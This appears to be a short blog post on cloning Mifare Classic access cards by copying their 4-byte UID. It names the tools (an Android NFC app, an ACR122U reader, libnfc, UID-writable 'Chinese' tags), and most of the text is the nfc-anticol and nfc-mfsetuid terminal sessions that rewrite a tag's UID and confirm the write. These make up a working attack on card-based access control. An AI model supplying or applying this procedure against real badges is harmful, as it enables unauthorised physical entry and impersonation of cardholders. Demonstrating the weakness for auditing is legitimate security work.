I observed that most Mifare Classic based access cards use only the first 4 bytes (the ID). These can be read using an Android phone and for example “NFC Taginfo” app. Afterwards cloning can be done using an ACR122U and “chinese clone tags”. These tags are special. They allow reading AND writing of the first 4 bytes, while others don’t. On Linux changing the tag ID (first 4 bytes) can be done using libnfc. The output may look like this (changing ID from 01234567 to da08738d):
Check tag ID:
root@laptop:~/rfid# nfc-anticol
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd
Found tag with
UID: 01234567
ATQA: 0004
SAK: 08
Change ID to da08738d
root@laptop:~/rfid# nfc-mfsetuid da08738d
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd
Found tag with
UID: 01234567
ATQA: 0004
SAK: 08
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: da 08 73 8d 2c 08 04 00 46 59 25 58 49 10 23 02 c2 99
Received bits: 0a
Check if write was successful:
root@laptop:~/rfid# nfc-anticol
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: da 08 73 8d 2c
Sent bits: 93 70 da 08 73 8d 2c bd 37
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd
Found tag with
UID: da08738d
ATQA: 0004
SAK: 08
root@laptop:~/rfid#